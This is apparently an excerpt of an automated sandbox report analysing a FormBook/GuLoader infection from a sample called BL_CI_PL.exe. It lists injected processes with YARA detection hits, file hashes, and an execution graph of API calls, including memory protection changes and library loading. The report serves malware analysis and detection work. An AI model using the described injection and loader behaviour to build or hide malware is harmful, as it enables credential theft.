                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: NETSTAT.EXE PID: 4520 Parent PID: 4528

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:06
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                    Imagebase:0xcc0000
                                                                                                                                                    File size:32768 bytes
                                                                                                                                                    MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.30167876029.0000000003877000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.30161247591.0000000002ED2000.00000004.00000020.sdmp, Author: Florian Roth

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: wscript.exe PID: 380 Parent PID: 4528

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:22
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                    Imagebase:0x7c0000
                                                                                                                                                    File size:147456 bytes
                                                                                                                                                    MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001D.00000002.30160230077.0000000002AC9000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001D.00000002.30169443980.0000000004F37000.00000004.00020000.sdmp, Author: Florian Roth

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 8012 Parent PID: 4528

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:34
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000002.29975987031.0000000002C20000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 7704 Parent PID: 4528

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:42
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 3016 Parent PID: 8012

                                                                                                                                                    General

                                                                                                                                                    Start time:14:12:16
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000020.00000002.30154748780.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000020.00000000.29972117697.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 7216 Parent PID: 7704

                                                                                                                                                    General

                                                                                                                                                    Start time:14:12:24
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000021.00000000.30054816737.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000021.00000002.30154741238.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >

                                                                                                                                                      Analysis Process: BL_CI_PL.exe PID: 1880 Parent PID: 7284 BL_CI_PL.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:8.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:30.5%
                                                                                                                                                      Signature Coverage:6.9%
                                                                                                                                                      Total number of Nodes:394
                                                                                                                                                      Total number of Limit Nodes:15

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 1707 41e840 10 API calls 1708 41e9c1 __vbaFreeStr __vbaFreeStr __vbaFreeStr 1707->1708 1709 41e91e 1707->1709 1710 41e936 1709->1710 1711 41e926 __vbaNew2 1709->1711 1713 41e95b 1710->1713 1714 41e94c __vbaHresultCheckObj 1710->1714 1711->1710 1715 41e976 __vbaHresultCheckObj 1713->1715 1716 41e988 __vbaFreeObj #702 __vbaStrMove __vbaFreeVar 1713->1716 1714->1713 1715->1716 1716->1708 1780 41f200 __vbaChkstk 1781 41f24a 6 API calls 1780->1781 1782 41f476 6 API calls 1781->1782 1783 41f2bd 1781->1783 1784 41f645 __vbaFreeStr __vbaFreeStr __vbaFreeStr 1782->1784 1785 41f4e7 #616 __vbaStrMove 1782->1785 1786 41f2e9 1783->1786 1787 41f2cd __vbaNew2 1783->1787 1789 41f52b 1785->1789 1790 41f50f __vbaNew2 1785->1790 1791 41f319 __vbaHresultCheckObj 1786->1791 1794 41f336 1786->1794 1787->1786 1792 41f578 1789->1792 1793 41f55b __vbaHresultCheckObj 1789->1793 1790->1789 1791->1794 1795 41f582 __vbaStrMove 1792->1795 1793->1795 1797 41f361 __vbaHresultCheckObj 1794->1797 1798 41f37e 1794->1798 1796 41f5b9 1795->1796 1799 41f5e4 1796->1799 1800 41f5c4 __vbaHresultCheckObj 1796->1800 1801 41f388 __vbaFreeObj 1797->1801 1798->1801 1802 41f5ee __vbaFreeStrList __vbaFreeObj #702 __vbaStrMove __vbaFreeVar 1799->1802 1800->1802 1803 41f3c5 1801->1803 1804 41f3a9 __vbaNew2 1801->1804 1802->1784 1805 41f412 1803->1805 1806 41f3f5 __vbaHresultCheckObj 1803->1806 1804->1803 1807 41f463 1805->1807 1808 41f443 __vbaHresultCheckObj 1805->1808 1806->1805 1809 41f46d __vbaFreeObj 1807->1809 1808->1809 1809->1782 1810 41dc00 1811 41dc37 12 API calls 1810->1811 1812 41dd27 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 1811->1812 1869 41ce80 1870 41ceba __vbaVarDup #629 __vbaVarTstEq __vbaFreeVarList 1869->1870 1871 41d773 11 API calls 1870->1871 1872 41cfad #685 __vbaObjSet 1870->1872 1874 41cfcd 1872->1874 1875 41cfd3 __vbaHresultCheckObj 1874->1875 1876 41cfe2 __vbaFreeObj 1874->1876 1875->1876 1877 41cffd 1876->1877 1878 41d0ae 1876->1878 1881 41d005 __vbaNew2 1877->1881 1885 41d015 1877->1885 1879 41d0ba 11 API calls 1878->1879 1880 41d16e 1878->1880 1882 41d6e2 7 API calls 1879->1882 1883 41d176 #613 __vbaStrVarMove 1880->1883 1884 41d1cc 1880->1884 1881->1885 1882->1871 1886 41d1a9 __vbaStrMove __vbaFreeVarList 1883->1886 1887 41d2c4 1884->1887 1888 41d1d8 1884->1888 1891 41d02b __vbaHresultCheckObj 1885->1891 1892 41d03a 1885->1892 1886->1882 1893 41d2d0 1887->1893 1894 41d356 __vbaR8IntI4 1887->1894 1889 41d1f0 1888->1889 1890 41d1e0 __vbaNew2 1888->1890 1901 41d215 1889->1901 1902 41d206 __vbaHresultCheckObj 1889->1902 1890->1889 1891->1892 1905 41d04b __vbaHresultCheckObj 1892->1905 1906 41d05a __vbaFreeObj __vbaVarDup #528 __vbaStrVarMove 1892->1906 1897 41d2e8 1893->1897 1898 41d2d8 __vbaNew2 1893->1898 1895 41d366 #702 __vbaStrMove __vbaFreeVar #690 1894->1895 1896 41d3bb 1894->1896 1895->1882 1899 41d3c7 1896->1899 1900 41d476 1896->1900 1909 41d30d 1897->1909 1910 41d2fe __vbaHresultCheckObj 1897->1910 1898->1897 1907 41d3df 1899->1907 1908 41d3cf __vbaNew2 1899->1908 1903 41d482 __vbaVarDup #528 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 1900->1903 1904 41d559 __vbaLenBstr 1900->1904 1917 41d230 __vbaHresultCheckObj 1901->1917 1918 41d242 6 API calls 1901->1918 1902->1901 1913 41d4ff 1903->1913 1914 41d4ef __vbaNew2 1903->1914 1911 41d56c #587 __vbaStrR8 __vbaStrMove 1904->1911 1912 41d60f #685 __vbaObjSet 1904->1912 1905->1906 1906->1886 1920 41d3f5 __vbaHresultCheckObj 1907->1920 1921 41d404 1907->1921 1908->1907 1922 41d325 __vbaHresultCheckObj 1909->1922 1923 41d337 __vbaStrMove __vbaFreeObj 1909->1923 1910->1909 1915 41d5ad 1911->1915 1916 41d59d __vbaNew2 1911->1916 1919 41d62f 1912->1919 1924 41d515 __vbaHresultCheckObj 1913->1924 1925 41d524 1913->1925 1914->1913 1930 41d5c3 __vbaHresultCheckObj 1915->1930 1931 41d5d2 1915->1931 1916->1915 1917->1918 1918->1882 1926 41d635 __vbaHresultCheckObj 1919->1926 1927 41d644 __vbaFreeObj 1919->1927 1920->1921 1932 41d431 __vbaFreeObj #527 __vbaStrMove #690 __vbaFreeStr 1921->1932 1933 41d41f __vbaHresultCheckObj 1921->1933 1922->1923 1923->1882 1924->1925 1935 41d54b __vbaFreeObj 1925->1935 1936 41d53c __vbaHresultCheckObj 1925->1936 1926->1927 1928 41d66d 1927->1928 1929 41d6dc 1927->1929 1934 41d675 __vbaNew2 1928->1934 1937 41d685 1928->1937 1929->1882 1930->1931 1938 41d5e7 __vbaHresultCheckObj 1931->1938 1939 41d5f6 __vbaStrMove __vbaFreeObj 1931->1939 1932->1882 1933->1932 1934->1937 1935->1882 1936->1935 1940 41d69b __vbaHresultCheckObj 1937->1940 1941 41d6aa 1937->1941 1938->1939 1939->1882 1940->1941 1942 41d6d1 __vbaFreeObj #554 1941->1942 1943 41d6c2 __vbaHresultCheckObj 1941->1943 1942->1929 1943->1942 2018 41ef80 2019 41efba #536 __vbaStrMove #581 __vbaLenBstr __vbaFpR8 2018->2019 2020 41f038 __vbaFreeStr __vbaFreeVar 2019->2020 2022 41f060 11 API calls 2020->2022 2023 41f134 2020->2023 2022->2023 2024 41f14c 2023->2024 2025 41f13c __vbaNew2 2023->2025 2026 41f171 2024->2026 2027 41f162 __vbaHresultCheckObj 2024->2027 2025->2024 2028 41f191 __vbaFreeObj 2026->2028 2029 41f182 __vbaHresultCheckObj 2026->2029 2027->2026 2030 41f1d0 __vbaFreeStr 2028->2030 2029->2028 1717 405a42 1718 41fde0 __vbaFreeVarList 1717->1718 1720 41fe7b __vbaNew2 1718->1720 1721 41fe8b 1718->1721 1720->1721 1722 41fea1 __vbaHresultCheckObj 1721->1722 1723 41feb0 1721->1723 1722->1723 1724 41feec __vbaHresultCheckObj 1723->1724 1725 41fefe __vbaFreeObj 1723->1725 1724->1725 1726 41ff2f 1725->1726 1694 2b32536 1695 2b32563 1694->1695 1698 2b41dff 1695->1698 1700 2b41d93 1698->1700 1702 2b42897 1700->1702 1701 2b325fa 1703 2b42909 NtProtectVirtualMemory 1702->1703 1703->1701 1992 2b4073f 1993 2b40744 1992->1993 1993->1992 1994 2b401bf GetPEB 1993->1994 1996 2b407f7 1993->1996 1995 2b41465 1994->1995 1704 2b33c3f 1705 2b3c311 TerminateProcess 1704->1705 1983 2b3c3fe GetPEB 1997 4059cd 1998 41e140 __vbaVarDup #632 __vbaVarTstEq __vbaFreeVarList 1997->1998 1999 41e214 11 API calls 1998->1999 2000 41e2ca #554 1998->2000 1999->2000 2001 41e2fc __vbaFreeStr __vbaAryDestruct 2000->2001 1827 41f6d0 1828 41f70d #573 __vbaVarTstEq __vbaFreeVarList 1827->1828 1829 41fc77 1828->1829 1830 41f7c9 7 API calls 1828->1830 1833 41fc7d #574 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 1829->1833 1831 41f9a2 __vbaStrCmp 1830->1831 1832 41f869 10 API calls 1830->1832 1837 41fa31 __vbaStrCmp 1831->1837 1838 41f9ba 9 API calls 1831->1838 1834 41f92a __vbaNew2 1832->1834 1844 41f93a 1832->1844 1835 41fcc8 9 API calls 1833->1835 1836 41fd1c 12 API calls 1833->1836 1834->1844 1835->1836 1840 41fa47 1837->1840 1841 41fae8 #631 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 1837->1841 1838->1833 1842 41fa5f 1840->1842 1843 41fa4f __vbaNew2 1840->1843 1845 41fb38 6 API calls 1841->1845 1846 41fb7f __vbaStrCmp 1841->1846 1853 41fa75 __vbaHresultCheckObj 1842->1853 1854 41fa84 1842->1854 1843->1842 1847 41f950 __vbaHresultCheckObj 1844->1847 1848 41f95f 1844->1848 1845->1833 1849 41fb97 1846->1849 1850 41fbba 9 API calls 1846->1850 1847->1848 1857 41f977 __vbaHresultCheckObj 1848->1857 1858 41f989 __vbaStrMove __vbaFreeObj 1848->1858 1852 41fbaf #554 1849->1852 1855 41fdda __vbaErrorOverflow 1849->1855 1850->1833 1851 41fc45 #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaOnError 1850->1851 1851->1833 1852->1833 1853->1854 1860 41fa9c __vbaHresultCheckObj 1854->1860 1861 41faae __vbaStrMove __vbaFreeObj #648 __vbaFreeVar 1854->1861 1856 41fde0 __vbaFreeVarList 1855->1856 1862 41fe8b 1856->1862 1863 41fe7b __vbaNew2 1856->1863 1857->1858 1858->1833 1860->1861 1861->1833 1864 41fea1 __vbaHresultCheckObj 1862->1864 1865 41feb0 1862->1865 1863->1862 1864->1865 1866 41feec __vbaHresultCheckObj 1865->1866 1867 41fefe __vbaFreeObj 1865->1867 1866->1867 1868 41ff2f 1867->1868 2002 41ebd0 2003 41ec0a #610 #553 #648 __vbaVarTstLt __vbaFreeVarList 2002->2003 2004 41ecb3 9 API calls 2003->2004 2005 41ed55 2003->2005 2006 41ed5b 14 API calls 2004->2006 2005->2006 2007 41eef0 __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeStr 2006->2007 2008 41ee30 11 API calls 2006->2008 2008->2007 2034 2b3d961 2035 2b3d979 2034->2035 2038 2b3d981 2035->2038 2039 2b3d98a 2038->2039 2042 2b3d9e4 2039->2042 2043 2b3d9ed 2042->2043 2044 2b3f7b6 3 API calls 2043->2044 2045 2b3da14 2044->2045 2046 2b3f7b6 3 API calls 2045->2046 2047 2b3da2c 2046->2047 2048 2b3f7b6 3 API calls 2047->2048 2049 2b3da46 2048->2049 2050 2b3f7b6 3 API calls 2049->2050 2051 2b3da5e 2050->2051 2052 2b3f7b6 3 API calls 2051->2052 2053 2b3dab8 2052->2053 2054 2b3f7b6 3 API calls 2053->2054 2055 2b3dad8 2054->2055 2056 2b3f7b6 3 API calls 2055->2056 2057 2b3daf9 2056->2057 2058 2b3f7b6 3 API calls 2057->2058 2059 2b3db10 2058->2059 2060 2b3f7b6 3 API calls 2059->2060 2061 2b3db28 2060->2061 2062 2b3f7b6 3 API calls 2061->2062 2063 2b3db90 2062->2063 2064 2b3f7b6 3 API calls 2063->2064 2065 2b3dbb9 2064->2065 2066 2b3f7b6 3 API calls 2065->2066 2067 2b3dbde 2066->2067 2068 2b3f7b6 3 API calls 2067->2068 2069 2b3dbfb 2068->2069 2070 2b3f7b6 3 API calls 2069->2070 2071 2b3dc0d 2070->2071 2072 2b3f7b6 3 API calls 2071->2072 2073 2b3dc62 2072->2073 2074 2b3f7b6 3 API calls 2073->2074 2075 2b3dc78 2074->2075 2076 2b3f7b6 3 API calls 2075->2076 2077 2b3dc8f 2076->2077 2078 2b3dca2 3 API calls 2077->2078 2079 2b3de3f 2078->2079 1727 2b360a7 1728 2b3ed02 1727->1728 1731 2b3dca2 1728->1731 1732 2b3dcd1 1731->1732 1739 2b3f7b6 1732->1739 1734 2b3dd2a 1735 2b3f7b6 3 API calls 1734->1735 1736 2b3dd44 1735->1736 1749 2b3dd54 1736->1749 1740 2b3146e 1739->1740 1740->1739 1741 2b3f8ba LoadLibraryA 1740->1741 1755 2b401bf GetPEB 1740->1755 1742 2b3f91f 2 API calls 1741->1742 1744 2b3f8ca 1742->1744 1744->1734 1745 2b3f893 1757 2b3f91f 1745->1757 1748 2b43d15 1748->1734 1750 2b3dd84 1749->1750 1751 2b3f7b6 3 API calls 1750->1751 1752 2b3dd98 1751->1752 1753 2b3f7b6 3 API calls 1752->1753 1754 2b3ddb1 1753->1754 1756 2b401e1 1755->1756 1756->1745 1759 2b3f967 1757->1759 1760 2b3f8a3 1759->1760 1761 2b3fae6 1759->1761 1760->1741 1760->1748 1762 2b3146e 1761->1762 1763 2b3f8ba LoadLibraryA 1762->1763 1765 2b401bf GetPEB 1762->1765 1771 2b3fd11 1762->1771 1764 2b3f91f GetPEB 1763->1764 1766 2b3f8ca 1764->1766 1767 2b3f893 1765->1767 1766->1759 1768 2b3f91f GetPEB 1767->1768 1769 2b3f8a3 1768->1769 1769->1763 1770 2b43d15 1769->1770 1770->1759 1771->1759 1643 41c620 1644 41c663 #527 __vbaStrMove __vbaStrCmp __vbaFreeStr 1643->1644 1645 41c6f0 11 API calls 1644->1645 1646 41c7c7 1644->1646 1645->1646 1647 41c7d4 __vbaHresultCheckObj 1646->1647 1648 41c7e6 1646->1648 1647->1648 1649 41ce73 1648->1649 1650 41c7ff #564 1648->1650 1649->1649 1651 41c814 __vbaHresultCheck 1650->1651 1652 41c81b __vbaI4Var 1650->1652 1651->1652 1685 41d820 1652->1685 1653 41c858 1654 41c85c __vbaHresultCheckObj 1653->1654 1655 41c86e __vbaFreeVarList #574 __vbaStrMove __vbaStrCopy __vbaStrMove 1653->1655 1654->1655 1656 41c8dc 1655->1656 1657 41c8e0 __vbaHresultCheckObj 1656->1657 1658 41c8f2 10 API calls 1656->1658 1657->1658 1659 41c9ea 1658->1659 1660 41ca00 __vbaFreeStrList __vbaFreeVarList 1659->1660 1661 41c9ee __vbaHresultCheckObj 1659->1661 1662 41ca36 __vbaStrCopy __vbaStrCopy 1660->1662 1661->1660 1663 41ca68 1662->1663 1664 41ca6c __vbaHresultCheckObj 1663->1664 1665 41ca7e 8 API calls 1663->1665 1664->1665 1666 41cb34 1665->1666 1667 41cb38 __vbaHresultCheckObj 1666->1667 1668 41cb4a 6 API calls 1666->1668 1667->1668 1669 41cbef __vbaFreeStrList __vbaFreeVar __vbaLenBstrB 1668->1669 1670 41cc51 1669->1670 1671 41cc70 #581 __vbaFpI4 1670->1671 1672 41cc5e __vbaHresultCheckObj 1670->1672 1673 41ccb9 1671->1673 1672->1671 1674 41ccd3 1673->1674 1675 41ccbd __vbaHresultCheckObj 1673->1675 1676 41ccd9 #714 #648 __vbaStrCopy __vbaLenBstrB __vbaI4Var 1674->1676 1675->1676 1677 41cd6d 1676->1677 1678 41cd71 __vbaHresultCheckObj 1677->1678 1679 41cd7f __vbaFreeStr __vbaFreeVarList 1677->1679 1678->1679 1680 41cdaf 1679->1680 1681 41cdc1 __vbaAryDestruct __vbaFreeStr 1680->1681 1682 41cdb3 __vbaHresultCheckObj 1680->1682 1682->1681 1686 41d85a __vbaStrCopy __vbaVarDup #547 __vbaVarTstGt __vbaFreeVarList 1685->1686 1687 41d921 15 API calls 1686->1687 1688 41da44 1686->1688 1689 41da4a #583 __vbaFpR8 1687->1689 1688->1689 1690 41da71 11 API calls 1689->1690 1691 41db3d __vbaR8IntI4 1689->1691 1690->1691 1692 41db9e 6 API calls 1691->1692 1692->1653 1813 41ea20 25 API calls 1957 2b30590 1958 2b3f7b6 3 API calls 1957->1958 1959 2b305ab 1958->1959 1693 4016a4 #100 1948 2b30c5a 1949 2b30c68 1948->1949 1952 2b40b8d 1949->1952 1951 2b30c6d 1953 2b40bdb 1952->1953 1954 2b401bf GetPEB 1953->1954 1955 2b40be3 1954->1955 1955->1951 1960 41dd70 1961 41ddaa __vbaStrCopy __vbaStrCopy #538 __vbaVarTstEq __vbaFreeVar 1960->1961 1962 41de74 1961->1962 1963 41de37 #612 __vbaStrVarMove __vbaStrMove __vbaFreeVar 1961->1963 1965 41de7a __vbaStrCopy #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 1962->1965 1964 41de61 1963->1964 1964->1965 1970 41e137 __vbaErrorOverflow 1964->1970 1966 41dec2 #512 __vbaStrMove 1965->1966 1967 41df9f #610 #553 #696 __vbaVarTstLt __vbaFreeVarList 1965->1967 1971 41deee 1966->1971 1972 41dede __vbaNew2 1966->1972 1968 41e09d __vbaLenBstr 1967->1968 1969 41dfff 11 API calls 1967->1969 1973 41e0e6 7 API calls 1968->1973 1969->1968 1974 41e140 __vbaVarDup #632 __vbaVarTstEq __vbaFreeVarList 1970->1974 1978 41df13 __vbaStrMove 1971->1978 1979 41df04 __vbaHresultCheckObj 1971->1979 1972->1971 1975 41e214 11 API calls 1974->1975 1976 41e2ca #554 1974->1976 1975->1976 1977 41e2fc __vbaFreeStr __vbaAryDestruct 1976->1977 1980 41df3b 1978->1980 1979->1978 1981 41df41 __vbaHresultCheckObj 1980->1981 1982 41df53 __vbaFreeStrList __vbaFreeObj #702 __vbaStrMove __vbaFreeVar 1980->1982 1981->1982 1982->1967 1984 41e330 1985 41e36a __vbaStrCopy #514 __vbaStrMove __vbaStrCmp __vbaFreeStr 1984->1985 1986 41e445 1985->1986 1987 41e3db 9 API calls 1985->1987 1988 41e44b #698 __vbaVarTstEq __vbaFreeVar 1986->1988 1987->1988 1989 41e492 16 API calls 1988->1989 1990 41e568 6 API calls 1988->1990 1989->1990 2010 41e5f0 2011 41e627 __vbaStrCopy __vbaVarDup #561 __vbaFreeVar 2010->2011 2012 41e697 9 API calls 2011->2012 2013 41e71a 2011->2013 2014 41e720 __vbaVarDup #518 __vbaVarTstLt __vbaFreeVarList 2012->2014 2013->2014 2015 41e7d2 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeObj 2014->2015 2016 41e77a 6 API calls 2014->2016 2016->2015 1814 2b362c4 1817 2b3f1c0 1814->1817 1816 2b362ca 1818 2b3146e 1817->1818 1818->1816 1819 2b3f8ba LoadLibraryA 1818->1819 1821 2b401bf GetPEB 1818->1821 1820 2b3f91f 2 API calls 1819->1820 1822 2b3f8ca 1820->1822 1823 2b3f893 1821->1823 1822->1816 1824 2b3f91f 2 API calls 1823->1824 1825 2b3f8a3 1824->1825 1825->1819 1826 2b43d15 1825->1826 1826->1816 1776 2b30c8e 1777 2b3e4b8 1776->1777 1778 2b3dd54 3 API calls 1777->1778 1779 2b3e512 1778->1779

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 02B3FAE6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
